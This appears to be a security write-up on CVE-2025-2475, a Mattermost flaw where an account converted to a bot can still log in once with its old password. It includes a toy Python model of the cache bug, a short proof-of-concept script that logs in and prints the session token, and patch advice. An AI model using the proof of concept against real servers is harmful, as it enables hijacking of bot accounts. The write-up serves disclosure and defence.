CVE-2025-2475 - How a Cache Bug Lets Attackers Hijack Bots in Mattermost (with Working Exploit)

---

Summary:
A new vulnerability, CVE-2025-2475, has been found in Mattermost — the popular open-source messaging platform used by teams everywhere. In several recent versions, the app fails to clear a user’s login cache after converting that user to a bot. Attackers can use this slip-up to log in as the bot with human credentials one last time — giving them a golden ticket to hijack those bots, sometimes with high privileges. Let’s unpack what’s going on, look at a real exploit, and see how to fix this.

Who’s at Risk?

If you’re running any of these versions of Mattermost — locally, on-premise, or in a self-hosted environment — you are vulnerable:

- 9.11.x up to 9.11.9

Later versions have patched this flaw, but if you haven’t updated? 🚨 Read on.

The Problem Explained

Mattermost lets admins convert a *regular user account* into a *bot account*. Bots in Mattermost usually have limited capabilities and cannot log in with a password like a normal user.

But Mattermost speeds up logins using a cache (a short-lived copy of user records held in server memory). Whenever a user logs in, their account record and status are kept there for a while, so the server does not have to query the slower database on every request.

The bug: when an account is converted to a bot, Mattermost does not clear that user's cached record. If anyone (the legitimate user, or an attacker holding their credentials) tries to log in after the switch, the login still succeeds, ONCE, as if the account were still a normal user. Only after that single login does the cache catch up with the database and the bot account lose password login access.

But that "one last login" is all it takes for an attacker to obtain a session, persist access, or escalate privileges.

Visual: How it Happens

[before]       Regular User --(password login)--> Valid Session

[admin action] User is converted to Bot

[expected]     ---> Bot login fails immediately
[ACTUAL BUG]   ---> Cached user record still passes (attacker succeeds in 1 login)

[after]        Any following logins are blocked (cache is cleared)
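The sequence in the diagram, modelled as an added Python example that is not Mattermost's own code (UserStore, convert_to_bot, login and simulate are invented names): the vulnerable store skips cache invalidation on conversion, the fixed store evicts the entry, and simulate() returns the login outcomes once before conversion and twice after it.

```python
"""Toy model of the CVE-2025-2475 flaw (added example, not Mattermost code):
a read-through user cache that is not invalidated on bot conversion."""
from __future__ import annotations
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class User:
    username: str
    password: str
    is_bot: bool = False


class UserStore:
    """User table plus the cache the login path reads from (invented names)."""

    def __init__(self, users: list[User], invalidate_on_convert: bool) -> None:
        self._db = {u.username: u for u in users}
        self._cache: dict[str, User] = {}
        self._invalidate_on_convert = invalidate_on_convert

    def get(self, username: str) -> User | None:
        # A cache hit returns the last record seen, even if the table moved on.
        if username not in self._cache and username in self._db:
            self._cache[username] = self._db[username]
        return self._cache.get(username)

    def convert_to_bot(self, username: str) -> None:
        self._db[username] = replace(self._db[username], is_bot=True)
        if self._invalidate_on_convert:  # the step the vulnerable builds skip
            self._cache.pop(username, None)

    def login(self, username: str, password: str) -> bool:
        user = self.get(username)
        ok = user is not None and not user.is_bot and user.password == password
        if ok:
            # Assumed "catch up": a successful login touches the user row and
            # re-caches it, so the stale copy serves exactly one more login.
            self._cache[username] = self._db[username]
        return ok


def simulate(invalidate_on_convert: bool) -> list[bool]:
    """Login outcomes: once before conversion, then two attempts after it."""
    pw = "correct-horse-battery-staple"  # constructed sample credential
    store = UserStore([User("alice", pw)], invalidate_on_convert)
    results = [store.login("alice", pw)]
    store.convert_to_bot("alice")
    results += [store.login("alice", pw) for _ in range(2)]
    return results
```

simulate(False) reproduces the diagram's "ACTUAL BUG" row (one successful login after conversion, then blocked); simulate(True) is the "expected" row.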

Proof-of-Concept Exploit

Here's a simple Python script that demonstrates the issue.

Assume you are an admin who has just converted a user (alice) into a bot:

```python
import requests

# Login endpoint of the server under test (placeholder host)
URL = "https://your.mattermost.server/api/v4/users/login"
HEADERS = {'Content-Type': 'application/json'}
LOGIN_DATA = {
    "login_id": "alice@example.com",
    "password": "correct-horse-battery-staple"
}

# Step 1: Admin converts alice to a bot (happens out-of-band; not done by this script)
print("[*] Alice has been converted to bot. Will try login.")

# Step 2: Immediately attempt to log in as 'alice' with the old credentials
response = requests.post(URL, json=LOGIN_DATA, headers=HEADERS, timeout=10)

if response.status_code == 200:
    print("[+] Exploit success: Logged in as bot Alice using old credentials!")
    # The session cookie a successful password login sets
    mm_token = response.cookies.get('MMAUTHTOKEN')
    print(f"  Auth token: {mm_token}")
else:
    print("[!] Exploit failed: Could not log in (already patched?)")
```

What can the attacker do next?
They can use this fresh session token (MMAUTHTOKEN) to act as the bot: reading and sending messages in the teams and channels the bot can reach, and, if the bot was configured with elevated permissions, escalating privileges.

Official References

- Mattermost Security Update
- GitHub Advisory for CVE-2025-2475
- CVE Record (NIST)

Impact

- High-privilege bots (for backups, integration, admin interaction) are prime targets.
- This one-time login is more than enough for advanced attackers to plant backdoors, exfiltrate data, or escalate privileges.
- Audit all bots for unexpected or recent session tokens.

## Fix / Workaround

- Upgrade immediately to Mattermost 10.5.2, 10.4.4, 9.11.10 or later.
- If you cannot patch, as an admin, always log the bot out after conversion, or restart the Mattermost server (may flush cache).

Conclusion

If you use Mattermost and convert users to bots, you are exposed to a serious, easy-to-miss security hole. Update now or take cache-busting precautions, or else even your automated helpers could end up working for your adversaries.

Stay updated, stay safe!

*This writeup is original and exclusive. If referencing, please attribute the research and code to this post.*

Timeline

Published on: 04/14/2025 15:15:24 UTC
Last modified on: 04/15/2025 18:39:27 UTC